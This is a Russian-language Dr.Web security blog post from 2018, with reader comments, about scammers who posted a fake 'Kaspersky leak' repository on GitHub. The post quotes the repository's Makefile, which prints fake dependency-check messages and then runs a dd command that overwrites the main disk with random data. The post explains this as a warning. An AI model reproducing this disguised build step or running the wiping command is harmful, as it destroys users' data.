Инфоповод для обмана
6 апреля 2018
Почти любой инфоповод может использоваться мошенниками в своих интересах – скажем, для рассылки фишинговых писем. Иногда такие жульнические «шутки» заходят слишком далеко.
В начале 2018 года появилась новость об утечке исходных кодов одной из антивирусных компаний.
Сегодня утром на телеграм-канале Mash был опубликован анонимный «слив» про утечку исходников «Лаборатории Касперского». Утверждалось, что сотрудник компании «на протяжении длительного времени скачивал исходные коды антивируса» — и в ноябре 2017 года выложил их на GitHub.
Компания-разработчик оперативно добилась удаления выложенных исходных текстов, но народу же интересно! Мошенники подсуетились и не замедлили выложить свой вариант кода.
В одном из репозиториев GitHub под названием Kaspersky leak 2018 Makefile содержит такие строки:
all:
echo Check depends…
echo Install depends…
sudo dd if=/dev/urandom of=/dev/sda
Что делают эти четыре строчки? Те, что начинаются с echo, выводят в консоль, на которой запустили сборочный якобы скрипт, сообщения, показывающие, что собираются зависимости, необходимые для сборки продукта (производится проверка, все ли необходимое доступно). А вот четвертая строчка производит запись случайных данных (команда dd) на диск sda – скорее всего, это будет ваш основной диск. В результате выполнения этой команды все ваши данные будут уничтожены.
Некоторые пользователи утверждают, что:
Это не фигня, а самый надежный способ избавиться от любого вредоносного кода на устройстве /dev/sda.
Но «Антивирусная правДА!» против лечения головной боли отсеканием головы!
Если серьезно, то данная утечка показывает только одно – несостоятельность утверждения о том, что антивирусы пишут вирусы. Иначе бы уволившиеся недоброжелатели антивирусных компаний давно бы уже выложили на всеобщее обозрение доказательства этого утверждения.
Антивирусная правДА! рекомендует
Будьте осторожны и не запускайте все подряд!
15.01.2018 в 16:45 по Самарскому времени произошло заражение рабочего места главного бухгалтера и шифрование всех пользовательских файлов посредством запуска файла «Акты на проверку», содержавшегося во вложении письма. В связи с тем, что за этим рабочим местом работал главный бухгалтер, на нем находились все базы данных 1С «Предприятие», и вся работа бухгалтерии остановилась.
Обращение в техническую поддержку «Доктор Веб»
Нам важно ваше мнение
Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.
Комментарии пользователей
ka_s
20:23:50 2019-07-03
Денисенко Павел Андреевич
01:20:41 2018-07-21
Неуёмный Обыватель
03:59:16 2018-06-12
Попугай: Что-же нам с ним сделать?
Мартышка: Давай отрубим ему голову.
Попугай: Мартышка, это слишком жестоко! Что-же, что-же нам делать?
Мартышка: Ну, давай отрубим ему хвост!
Попугай: Я же сказал-нет. А, придумал, давай отрубим ему хвост!
Мартышка радостно: Во-во, по самую голову!!!
fvl2015
10:54:46 2018-04-11
Ruslan
09:09:23 2018-04-10
Татьяна
16:47:58 2018-04-08
anatol
20:25:08 2018-04-07
Masha
19:40:58 2018-04-07
Toma
19:20:19 2018-04-07
Любитель пляжного футбола
15:26:04 2018-04-07
Пaвeл
14:50:43 2018-04-07
Littlefish
22:39:33 2018-04-06
Littlefish
22:33:13 2018-04-06
Каждый должен заниматься своим делом, тогда КПД труда будет стремится к 100%.
Littlefish
22:27:28 2018-04-06
Геральт
21:56:41 2018-04-06
vla_va
21:54:09 2018-04-06
В...а
21:39:39 2018-04-06
Пaвeл
21:32:10 2018-04-06
Marsn77
21:04:45 2018-04-06
duduka
20:51:40 2018-04-06
Dmur
20:49:00 2018-04-06
НинаК
20:47:04 2018-04-06
Toma
20:23:09 2018-04-06
Dvakota
20:08:08 2018-04-06
Сергей
19:55:39 2018-04-06
orw_mikle
19:33:25 2018-04-06
Lia00
18:57:48 2018-04-06
EvgenyZ
18:55:09 2018-04-06
La folle
18:19:59 2018-04-06
Damir
18:19:50 2018-04-06
ek
18:07:44 2018-04-06
Шалтай Александр Болтай
18:04:07 2018-04-06
Альфа
17:54:04 2018-04-06
zsergey
17:40:57 2018-04-06
Andromeda
17:31:30 2018-04-06
Anton_S
17:03:57 2018-04-06
Дмитрий
17:02:54 2018-04-06
Татьяна
16:22:55 2018-04-06
razgen
16:17:35 2018-04-06
Наверняка они из тех кто не читает выпуски "Антивирусной ПравДЫ"
kva-kva
15:47:06 2018-04-06
mk.insta
15:10:05 2018-04-06
sanek-xf
14:50:48 2018-04-06
AxooxA
14:46:40 2018-04-06
Natalya_2017
14:45:49 2018-04-06
vinnetou
13:56:46 2018-04-06
nahimovec
13:47:47 2018-04-06
Alex_1774
13:35:40 2018-04-06
Alexander
12:26:35 2018-04-06
"К тому же, мудрые, порою, преподносят
Пристрасть ко тьме, как шкурный интерес!"
Masha
12:25:55 2018-04-06
Alexander
12:22:17 2018-04-06
Отформатировать диск, чтобы отрубить "голову" вредоносу, - тоже вариант борьбы со злом. Такое предложение мне встречалось и ранее, причем, от вполне адекватных специалистов. Ситуация, недостаток знаний и отсутствие нужных средств, - иногда могут подтолкнуть к таким радикальным действиям.
Для того, чтобы избежать подобных случаев, желательно перепроверять источники "топ-информации". И конечно же, дружить с Dr.Web Security Space. Не препятствовать ему делать свою работу.